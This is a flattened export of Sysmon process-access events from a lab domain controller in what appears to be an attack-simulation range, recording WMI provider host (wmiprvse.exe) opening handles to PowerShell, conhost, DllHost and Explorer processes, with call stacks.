16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B6AA-00000000AD01}13356C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B5AA-00000000AD01}14692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAA-603E-B3AA-00000000AD01}10880C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.248{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.232{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 